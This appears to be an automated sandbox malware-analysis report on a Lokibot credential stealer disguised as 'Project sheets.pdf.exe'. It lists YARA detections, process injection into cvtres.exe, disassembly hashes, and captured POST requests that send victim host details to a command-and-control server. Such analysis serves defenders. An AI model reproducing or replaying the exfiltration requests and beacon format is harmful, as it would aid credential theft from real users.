Aug 11, 2022 06:44:08.957175970 CEST	9882	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:44:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c0pX9SJrHopzRCsEkDmDxwlNx0C41KoS8krJ5OgxEsOqET4277iXRW3J%2FWp2JHcXROzAxWooOe8cWiTJpbpDaNfjHGikivIw5A1OpyJxaquuggPEYvGU5TP02bgBIg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e507b3f7b91d8-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.3	49898	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:44:09.907279015 CEST	9882	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:44:09.924417973 CEST	9883	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:44:10.024667978 CEST	9883	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:44:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A8uhSCBmIXKRlfuG%2F6EDgs3Nh9LOjKk3NdY%2BN9yfSiF3S03bDoGetakChdva7ldiD%2BvTJDuSTvIs7znKB4Lzu7%2BAAco8%2BiNoqOwzPZxCDqD3J%2FLSBTi0p%2Fy1e7TDzw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e5081f8b99b98-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49750	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:21.832277060 CEST	1041	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:21.849293947 CEST	1041	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:21.929147005 CEST	1042	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G8RWXJ9cQ2lTbZIEiakeL%2BvJlw7GBQj5v6W8jHCN0RVD8MFGd3iAhGRjGRgY3kgjTkeYk5seGXg0mRicQQEFnc%2Fe90OlZ%2BzjF7i0rG%2F%2F5CMfbS%2FOvsPqEIVJpPmwCg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4dde7991906c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49751	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:22.964431047 CEST	1043	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:22.982178926 CEST	1043	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:23.073542118 CEST	1044	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NuFLm1%2BetFHr9%2F4RJj%2BfSY56%2Fyp%2F44kO%2BagWi8qLS5jmc3FWNYuuuS4dryA9ihrHDUpS5jRl4o9C1ZwUh9G2L3ovG1mleSN4EqUy7Wz4Vh32S1WXkdj5%2B7O52BO4hw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4de58e089025-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Project sheets.pdf.exePID: 5648, Parent PID: 5400

General

Target ID:	0
Start time:	06:42:05
Start date:	11/08/2022
Path:	C:\Users\user\Desktop\Project sheets.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Project sheets.pdf.exe"
Imagebase:	0xe40000
File size:	177696 bytes
MD5 hash:	B9FF215D1D69D1A6D7568EECC3ECD245
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cvtres.exePID: 5896, Parent PID: 5648

General

Target ID:	1
Start time:	06:42:07
Start date:	11/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Imagebase:	0xa40000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cvtres.exePID: 5920, Parent PID: 5648

General

Target ID:	2
Start time:	06:42:08
Start date:	11/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Imagebase:	0xa40000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cvtres.exePID: 3896, Parent PID: 5648

General

Target ID:	3
Start time:	06:42:08
Start date:	11/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Imagebase:	0xa40000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.501322554.0000000005046000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.243627091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Project sheets.pdf.exePID: 5648, Parent PID: 5400COMMON

Execution Graph

Execution Coverage:	25.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	36
Total number of Limit Nodes:	3

Executed Functions

Function 017F4030 Relevance: 4.1, Strings: 3, Instructions: 342
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|$<z, xrefs: 017F4492
|$<z, xrefs: 017F448B
|$<z, xrefs: 017F44A9

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: |$<z$|$<z$|$<z
API String ID: 0-1860209785
Opcode ID: 628ceef05bb56fb20502a5489122d2ba802b662b9baa967c03ba0feaee5dccf3
Instruction ID: 05416df7e20f0154a2a6c6065fd58f81d1ffd6f092c2e726a8c4569b0bc50776
Opcode Fuzzy Hash: 628ceef05bb56fb20502a5489122d2ba802b662b9baa967c03ba0feaee5dccf3
Instruction Fuzzy Hash: 28E16C75E0464ADFDB14CFA9C4808AFFBB2FF99310B148599C616AB315D334A982CF94

Uniqueness

Uniqueness Score: -1.00%

Function 017F40D8 Relevance: 4.0, Strings: 3, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|$<z, xrefs: 017F4492
|$<z, xrefs: 017F448B
|$<z, xrefs: 017F44A9

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: |$<z$|$<z$|$<z
API String ID: 0-1860209785
Opcode ID: cc917f8d7bb6ac5a8c2d74372b2675e3f9484265cfa71bb7f3d8c5ac0678b5bf
Instruction ID: e8148ac672f977547156921da33ee96379cc8e1852ec2ae9dec0f24b12fbb2d7
Opcode Fuzzy Hash: cc917f8d7bb6ac5a8c2d74372b2675e3f9484265cfa71bb7f3d8c5ac0678b5bf
Instruction Fuzzy Hash: CBC10474E0420ADFCB14DFA5C4808AFFBB2FF99310B148569D616AB354D734AA42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 017F40C8 Relevance: 4.0, Strings: 3, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|$<z, xrefs: 017F4492
|$<z, xrefs: 017F448B
|$<z, xrefs: 017F44A9

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: |$<z$|$<z$|$<z
API String ID: 0-1860209785
Opcode ID: 9aaac04da6ea5b9b8796614b3ff721e12bf3310a2c73920f847533e5586ba920
Instruction ID: 8937b0b5d8a25563d6de64bcb43adc5e5397d6bdc4944d9e914f10f9bedff14f
Opcode Fuzzy Hash: 9aaac04da6ea5b9b8796614b3ff721e12bf3310a2c73920f847533e5586ba920
Instruction Fuzzy Hash: 47C10574E0420ADFCB14DFA5C4808AFFBB2FF99310B148569D616A7355E734AA42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 017F9929 Relevance: 1.7, Strings: 1, Instructions: 447
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R(q(, xrefs: 017F9C79

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: R(q(
API String ID: 0-1972367136
Opcode ID: 3b8f5d63abc2e9a0db027f4e4c592c2ca7bcd11143c0a439d24828b59f7ac657
Instruction ID: 33a32cb9a6d2ee163dee8a4efc3286f449649e78ae21ca139aa5302f72c14fd3
Opcode Fuzzy Hash: 3b8f5d63abc2e9a0db027f4e4c592c2ca7bcd11143c0a439d24828b59f7ac657
Instruction Fuzzy Hash: 9E614770D0A2499FCB09CFB9D9806DEFBF2AF8A304F1484AAD601A7395D7349945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 017F1E68 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

u, xrefs: 017F1F8B

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: u
API String ID: 0-2947761970
Opcode ID: e3bf4d09fe22f7b940b93690ec23ad481e1b631d0b9ac4238c6f60bb2a6ebd27
Instruction ID: 1daa1f8ea7d4b97ad18a144ba78abf482784c4cae4f4440aabfa84f657696958
Opcode Fuzzy Hash: e3bf4d09fe22f7b940b93690ec23ad481e1b631d0b9ac4238c6f60bb2a6ebd27
Instruction Fuzzy Hash: FCD17275E1524ACFCB14CFA9C8409AEFBB2FF99310F64826ED615AB351D731A902CB40

Uniqueness

Uniqueness Score: -1.00%

Function 017F1ECF Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

u, xrefs: 017F1F8B

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: u
API String ID: 0-2947761970
Opcode ID: 9c5ebb353fcd4c9391e8f38096bf18ce5cbf4b77999b0a1fac5cb04277015bfd
Instruction ID: 181dc136542d1cda8bcd4a4cd1da80f6489fe4922880de91ec5de0399c4445ae
Opcode Fuzzy Hash: 9c5ebb353fcd4c9391e8f38096bf18ce5cbf4b77999b0a1fac5cb04277015bfd
Instruction Fuzzy Hash: 4AB10FB4E15219CFCB18CFA9C9809AEFBF2BF89310F20816AD515BB355D7359902CB54

Uniqueness

Uniqueness Score: -1.00%

Function 017F1F08 Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

u, xrefs: 017F1F8B

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: u
API String ID: 0-2947761970
Opcode ID: fd123a109444a3bfe4a534b52f771d9d0e77cd9fd5059504fb29385836f0c640
Instruction ID: bf19c89e47cb49e8ee49c84ebaf147326dcbbcd3bc615b212f8afed58da9f714
Opcode Fuzzy Hash: fd123a109444a3bfe4a534b52f771d9d0e77cd9fd5059504fb29385836f0c640
Instruction Fuzzy Hash: 5AB1EFB4E11219CFDB18CFAAC9809AEFBF2BF89310F20812AD515BB354D7359902CB54

Uniqueness

Uniqueness Score: -1.00%

Function 017F9459 Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

n_K, xrefs: 017F97A6

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: n_K
API String ID: 0-3499950289
Opcode ID: d86015bb612abcaee8db6610134896ca7a87bb2a1cb0dc7d86e4076b69adc515
Instruction ID: 440ebfddcaa8d2eb10171e728c449089833f0433eaa19095537fe97aa329d457
Opcode Fuzzy Hash: d86015bb612abcaee8db6610134896ca7a87bb2a1cb0dc7d86e4076b69adc515
Instruction Fuzzy Hash: 46B10578E042089FCB28DFB5D944A9EBBB2FF99310F10D06AD90AA7354DB355946CF10

Uniqueness

Uniqueness Score: -1.00%

Function 017F9468 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

n_K, xrefs: 017F97A6

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID: n_K
API String ID: 0-3499950289
Opcode ID: 050493c32c4f7e194c4d4040e1861aea5ea9ac239a96dbeaab13221fcd17db16
Instruction ID: 93a224921f8fcf3746f938c9fde0a814442b0bf8ec61f2901a7486442f0e991d
Opcode Fuzzy Hash: 050493c32c4f7e194c4d4040e1861aea5ea9ac239a96dbeaab13221fcd17db16
Instruction Fuzzy Hash: 3FB10378E042089FCB28DFB5D944AAEBBB2FF99310F10D46AD90AA7354DB345946CF10

Uniqueness

Uniqueness Score: -1.00%

Function 017F6E08 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d79aedc70806e4303d14a51cf1ea0647a9255ec304099c03a8de61e4d47cc4
Instruction ID: 112d7722f94d1e907776dfcce8d668662fe10a656c62524088a296a64149f338
Opcode Fuzzy Hash: 09d79aedc70806e4303d14a51cf1ea0647a9255ec304099c03a8de61e4d47cc4
Instruction Fuzzy Hash: C351E172D0460A9FCB14DFA9D84199EFBB2FF99310F14C16AE511AB395E734A901CF40

Uniqueness

Uniqueness Score: -1.00%

Function 017F2758 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a8d2d7ee7e8014dc4a3bf5e30b72be05ec1e59ccdc574a1ba69a0048de2a377
Instruction ID: d8553fe42aff04e6ad6b51ddafa318ace27083b3f32e715c4a5912fb6df7039d
Opcode Fuzzy Hash: 5a8d2d7ee7e8014dc4a3bf5e30b72be05ec1e59ccdc574a1ba69a0048de2a377
Instruction Fuzzy Hash: 4351E674E042099FDB08CFAAC9406AEFBF2BF88310F24C16AD615A7355D7349A418FA4

Uniqueness

Uniqueness Score: -1.00%

Function 017F3130 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd

Similarity

API ID:
String ID:
API String ID:
